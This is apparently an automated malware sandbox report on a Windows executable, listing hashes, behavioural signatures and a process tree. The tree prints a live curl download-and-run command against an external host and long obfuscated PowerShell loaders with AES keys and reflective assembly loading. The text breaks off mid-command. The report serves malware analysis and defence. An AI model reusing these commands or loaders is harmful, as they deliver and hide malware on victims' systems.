177b40f96a09a3919b2c8846ca73abb09855d078ff9dee89610bc2b75d44cb31

Analysis

max time kernel
111s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
04/07/2023, 13:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a299e230a172c79e5d30de052.exe
Size

3KB
MD5

a299e230a172c79e5d30de052cefaddc
SHA1

9ac47e62085f05a4ce58bd999332ab04fee40e30
SHA256

177b40f96a09a3919b2c8846ca73abb09855d078ff9dee89610bc2b75d44cb31
SHA512

0ca74bb6c51bc374be01402aa8e4a284c1730c49ba6ba1425871c754e1dfd8a7b7bfe92dd6e854941f299e724488ef5474f92253001503a8f38531b395e6b509

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4692 created 624	4692	v8pb4a2bgu.bat.exe	3
PID 1400 created 624	1400	$sxr-powershell.exe	3
PID 1400 created 624	1400	$sxr-powershell.exe	3
PID 4692 created 624	4692	v8pb4a2bgu.bat.exe	3
PID 4692 created 624	4692	v8pb4a2bgu.bat.exe	3

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation	a299e230a172c79e5d30de052.exe

Executes dropped EXE 3 IoCs

pid	Process
4692	v8pb4a2bgu.bat.exe
1400	$sxr-powershell.exe
320	$sxr-powershell.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\System32\vcruntime140_1d.dll	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\System32\ucrtbased.dll	v8pb4a2bgu.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4692 set thread context of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 1400 set thread context of 4592	1400	$sxr-powershell.exe	105
PID 1400 set thread context of 2576	1400	$sxr-powershell.exe	110
PID 4692 set thread context of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 set thread context of 4484	4692	v8pb4a2bgu.bat.exe	113

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File created	C:\Windows\$sxr-powershell.exe	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	v8pb4a2bgu.bat.exe
File created	C:\Windows\$sxr-mshta.exe	v8pb4a2bgu.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	v8pb4a2bgu.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2264	3520	WerFault.exe	49
1356	3428	WerFault.exe	43

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2312	PING.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4208	powershell.exe
4208	powershell.exe
4692	v8pb4a2bgu.bat.exe
4692	v8pb4a2bgu.bat.exe
4692	v8pb4a2bgu.bat.exe
2056	dllhost.exe
2056	dllhost.exe
2056	dllhost.exe
2056	dllhost.exe
4692	v8pb4a2bgu.bat.exe
4692	v8pb4a2bgu.bat.exe
1400	$sxr-powershell.exe
1400	$sxr-powershell.exe
1400	$sxr-powershell.exe
1400	$sxr-powershell.exe
4592	dllhost.exe
4592	dllhost.exe
4592	dllhost.exe
4592	dllhost.exe
1400	$sxr-powershell.exe
1400	$sxr-powershell.exe
320	$sxr-powershell.exe
320	$sxr-powershell.exe
320	$sxr-powershell.exe
320	$sxr-powershell.exe
1400	$sxr-powershell.exe
2576	dllhost.exe
2576	dllhost.exe
2576	dllhost.exe
2576	dllhost.exe
4692	v8pb4a2bgu.bat.exe
1736	dllhost.exe
1736	dllhost.exe
4692	v8pb4a2bgu.bat.exe
4692	v8pb4a2bgu.bat.exe
4484	dllhost.exe
4484	dllhost.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	4692	v8pb4a2bgu.bat.exe
Token: SeDebugPrivilege	4692	v8pb4a2bgu.bat.exe
Token: SeDebugPrivilege	2056	dllhost.exe
Token: SeDebugPrivilege	1400	$sxr-powershell.exe
Token: SeDebugPrivilege	1400	$sxr-powershell.exe
Token: SeDebugPrivilege	4592	dllhost.exe
Token: SeDebugPrivilege	320	$sxr-powershell.exe
Token: SeDebugPrivilege	1400	$sxr-powershell.exe
Token: SeDebugPrivilege	2576	dllhost.exe
Token: SeDebugPrivilege	4692	v8pb4a2bgu.bat.exe
Token: SeDebugPrivilege	1736	dllhost.exe
Token: SeDebugPrivilege	4692	v8pb4a2bgu.bat.exe
Token: SeDebugPrivilege	4484	dllhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1400	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 2000	1564	a299e230a172c79e5d30de052.exe	84
PID 1564 wrote to memory of 2000	1564	a299e230a172c79e5d30de052.exe	84
PID 2000 wrote to memory of 4528	2000	cmd.exe	86
PID 2000 wrote to memory of 4528	2000	cmd.exe	86
PID 2000 wrote to memory of 4208	2000	cmd.exe	87
PID 2000 wrote to memory of 4208	2000	cmd.exe	87
PID 4208 wrote to memory of 2564	4208	powershell.exe	88
PID 4208 wrote to memory of 2564	4208	powershell.exe	88
PID 2564 wrote to memory of 4484	2564	cmd.exe	90
PID 2564 wrote to memory of 4484	2564	cmd.exe	90
PID 4484 wrote to memory of 1204	4484	net.exe	91
PID 4484 wrote to memory of 1204	4484	net.exe	91
PID 2564 wrote to memory of 4692	2564	cmd.exe	100
PID 2564 wrote to memory of 4692	2564	cmd.exe	100
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 2056	4692	v8pb4a2bgu.bat.exe	101
PID 4692 wrote to memory of 1400	4692	v8pb4a2bgu.bat.exe	103
PID 4692 wrote to memory of 1400	4692	v8pb4a2bgu.bat.exe	103
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 4592	1400	$sxr-powershell.exe	105
PID 1400 wrote to memory of 320	1400	$sxr-powershell.exe	109
PID 1400 wrote to memory of 320	1400	$sxr-powershell.exe	109
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 1400 wrote to memory of 2576	1400	$sxr-powershell.exe	110
PID 2576 wrote to memory of 624	2576	dllhost.exe	3
PID 2576 wrote to memory of 680	2576	dllhost.exe	1
PID 2576 wrote to memory of 956	2576	dllhost.exe	11
PID 2576 wrote to memory of 64	2576	dllhost.exe	10
PID 2576 wrote to memory of 540	2576	dllhost.exe	81
PID 2576 wrote to memory of 868	2576	dllhost.exe	13
PID 2576 wrote to memory of 1044	2576	dllhost.exe	80
PID 2576 wrote to memory of 1056	2576	dllhost.exe	79
PID 2576 wrote to memory of 1164	2576	dllhost.exe	14
PID 680 wrote to memory of 2476	680	lsass.exe	56
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 4692 wrote to memory of 1736	4692	v8pb4a2bgu.bat.exe	111
PID 680 wrote to memory of 1328	680	lsass.exe	36
PID 2576 wrote to memory of 1196	2576	dllhost.exe	15
PID 680 wrote to memory of 2108	680	lsass.exe	62
PID 680 wrote to memory of 2476	680	lsass.exe	56
PID 2576 wrote to memory of 1228	2576	dllhost.exe	78
PID 2576 wrote to memory of 1248	2576	dllhost.exe	77

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8fdfc3b4-ea01-471e-ab84-1afa779472c0}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2056
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{05e339f2-166c-4306-b761-b70b5c4d14f4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4592
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{94348405-004c-4e56-ab1e-a8467bd37d55}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2576
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fd49f7ea-fec1-4230-83ca-ce0431557b3c}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6dde4b0f-9565-488d-9e90-c19025090164}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2528

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe
"C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -o %temp%\v8pb4a2bgu.bat https://upload.nugeta.net/uploads/Uni.bat & powershell start -WindowStyle hidden %temp%\v8pb4a2bgu.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\system32\curl.exe
    curl -o C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat https://upload.nugeta.net/uploads/Uni.bat
    3⤵
    PID:4528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start -WindowStyle hidden C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat" "
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:2564
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4484
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:1204
    - - C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe
        
        "v8pb4a2bgu.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fWQSl($smkIZ){ $wduXp=[System.Security.Cryptography.Aes]::Create(); $wduXp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wduXp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wduXp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wJHzsp6SPXfRfRJEp2DnWNjCp7yRoOX80D+K6Y8SDbg='); $wduXp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSnlfa5uZvt5/hSiWG2fmg=='); $qohan=$wduXp.CreateDecryptor(); $return_var=$qohan.TransformFinalBlock($smkIZ, 0, $smkIZ.Length); $qohan.Dispose(); $wduXp.Dispose(); $return_var;}function JrJro($smkIZ){ $sZImH=New-Object System.IO.MemoryStream(,$smkIZ); $xADsr=New-Object System.IO.MemoryStream; $zNLKG=New-Object System.IO.Compression.GZipStream($sZImH, [IO.Compression.CompressionMode]::Decompress); $zNLKG.CopyTo($xADsr); $zNLKG.Dispose(); $sZImH.Dispose(); $xADsr.Dispose(); $xADsr.ToArray();}function dfJQI($smkIZ,$LzKCP){ $bmjxj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$smkIZ); $EFqhw=$bmjxj.EntryPoint; $EFqhw.Invoke($null, $LzKCP);}$vHiXq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat').Split([Environment]::NewLine);foreach ($KVOmw in $vHiXq) { if ($KVOmw.StartsWith(':: ')) { $ZGLQh=$KVOmw.Substring(4); break; }}$MJAQp=[string[]]$ZGLQh.Split('\');$lpVtG=JrJro (fWQSl ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MJAQp[0])));$acjVV=JrJro (fWQSl ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MJAQp[1])));dfJQI $acjVV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dfJQI $lpVtG (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4692
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function qMEAm($SBLhF){ $OmgWn=[System.Security.Cryptography.Aes]::Create(); $OmgWn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OmgWn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OmgWn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30='); $OmgWn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA=='); $bzdRW=$OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')(); $oeVNg=$bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SBLhF, 0, $SBLhF.Length); $bzdRW.Dispose(); $OmgWn.Dispose(); $oeVNg;}function FpgXf($SBLhF){ $ACvdD=New-Object System.IO.MemoryStream(,$SBLhF); $fxSDY=New-Object System.IO.MemoryStream; $sioSc=New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::Decompress); $sioSc.CopyTo($fxSDY); $sioSc.Dispose(); $ACvdD.Dispose(); $fxSDY.Dispose(); $fxSDY.ToArray();}function qYOzs($SBLhF,$kaOgp){ $uGEfN=[System.Reflection.Assembly]::Load([byte[]]$SBLhF); $lPQfD=$uGEfN.EntryPoint; $lPQfD.Invoke($null, $kaOgp);}$OmgWn1 = New-Object System.Security.Cryptography.AesManaged;$OmgWn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bDukH = $OmgWn1.('rotpyrceDetaerC'[-1..-15] -join '')();$KjvsN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vIu/qtGS/x2SF+sMWSvDow==');$KjvsN = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN, 0, $KjvsN.Length);$KjvsN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN);$plOkO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NRF7C23+0Byt9JP09Qn3+DY9RWuWXg3qOZ5asN5y0ws=');$plOkO = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($plOkO, 0, $plOkO.Length);$plOkO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($plOkO);$BdVPD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YazMmludb1vvXcZAwlnHtw==');$BdVPD = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdVPD, 0, $BdVPD.Length);$BdVPD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdVPD);$Khvbp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf4gu7ZD/I0b6kn1xVw/lUgWPK+5TZfCSPo5/VhvOXuI85jnbHRoOd2fBY8oxjU26aXQHO2B52J1YA7TfWY3FWExstcJfnODtZBebrQGClVdHebcL2OSattonC3hU321X5S9joWtE4fv8lvmwXH8ZSMbOMFWFESDoOJt+1Bt/H4EOblhpHmooz9fO/Z0BQMWnBbu2ar5V+hEHCESz43Kaxu4hmpzzDEJu+AmLCnK5LBUY45S1drr3J7exCZSxUHJyRziq1L3pwqUI84KLwjoW/k6C5j/KY3rneb2ZEWz9plzz8jRvwboouGn1UIfaUeaBMH1+0BvjxLP3r34OlMXRA5fmStXzraQt7JAdtXUP8wXRdqcOKUQtp52SelQ6J0WjdGAtsvRvQubLio0A+mNT6WMINjpxOSFgujINR8XOic=');$Khvbp = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Khvbp, 0, $Khvbp.Length);$Khvbp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Khvbp);$OawVc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtBl8RDMM8q8D+f38cUwlQ==');$OawVc = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OawVc, 0, $OawVc.Length);$OawVc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OawVc);$FBZIn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vWt5Q/a84rfnuBa3yHiejA==');$FBZIn = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FBZIn, 0, $FBZIn.Length);$FBZIn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FBZIn);$AkiHH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UavpIk4tpnHdD1kgrI4R2w==');$AkiHH = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AkiHH, 0, $AkiHH.Length);$AkiHH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AkiHH);$fIDaQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFB5V6XdocehcH6idKuJ0w==');$fIDaQ = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fIDaQ, 0, $fIDaQ.Length);$fIDaQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fIDaQ);$HMBte = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzQvJLBl0kmxaMejxpYmTA==');$HMBte = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HMBte, 0, $HMBte.Length);$HMBte = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HMBte);$KjvsN0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8D3dfobAIMj6AYpSV1togQ==');$KjvsN0 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN0, 0, $KjvsN0.Length);$KjvsN0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN0);$KjvsN1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1bVhrF128/BjmNUc1iFP/g==');$KjvsN1 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN1, 0, $KjvsN1.Length);$KjvsN1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN1);$KjvsN2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NKOjM2E+a4FkOdDaJJVE3w==');$KjvsN2 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN2, 0, $KjvsN2.Length);$KjvsN2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN2);$KjvsN3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oWIK372gtRppDGwBPsAgnQ==');$KjvsN3 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN3, 0, $KjvsN3.Length);$KjvsN3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN3);$bDukH.Dispose();$OmgWn1.Dispose();if (@(get-process -ea silentlycontinue $KjvsN3).count -gt 1) {exit};$FrMqe = [Microsoft.Win32.Registry]::$fIDaQ.$AkiHH($KjvsN).$FBZIn($plOkO);$zSvhR=[string[]]$FrMqe.Split('\');$Odjii=FpgXf(qMEAm([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[1])));qYOzs $Odjii (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$SQOFS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[0]);$OmgWn = New-Object System.Security.Cryptography.AesManaged;$OmgWn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bzdRW = $OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')();$SQOFS = $bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SQOFS, 0, $SQOFS.Length);$bzdRW.Dispose();$OmgWn.Dispose();$ACvdD = New-Object System.IO.MemoryStream(, $SQOFS);$fxSDY = New-Object System.IO.MemoryStream;$sioSc = New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::$KjvsN1);$sioSc.$HMBte($fxSDY);$sioSc.Dispose();$ACvdD.Dispose();$fxSDY.Dispose();$SQOFS = $fxSDY.ToArray();$gZCIb = $Khvbp | IEX;$uGEfN = $gZCIb::$KjvsN2($SQOFS);$lPQfD = $uGEfN.EntryPoint;$lPQfD.$KjvsN0($null, (, [string[]] ($BdVPD)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1400
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMEAm($SBLhF){ $OmgWn=[System.Security.Cryptography.Aes]::Create(); $OmgWn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OmgWn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OmgWn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30='); $OmgWn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA=='); $bzdRW=$OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')(); $oeVNg=$bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SBLhF, 0, $SBLhF.Length); $bzdRW.Dispose(); $OmgWn.Dispose(); $oeVNg;}function FpgXf($SBLhF){ $ACvdD=New-Object System.IO.MemoryStream(,$SBLhF); $fxSDY=New-Object System.IO.MemoryStream; $sioSc=New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::Decompress); $sioSc.CopyTo($fxSDY); $sioSc.Dispose(); $ACvdD.Dispose(); $fxSDY.Dispose(); $fxSDY.ToArray();}function qYOzs($SBLhF,$kaOgp){ $uGEfN=[System.Reflection.Assembly]::Load([byte[]]$SBLhF); $lPQfD=$uGEfN.EntryPoint; $lPQfD.Invoke($null, $kaOgp);}$OmgWn1 = New-Object System.Security.Cryptography.AesManaged;$OmgWn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 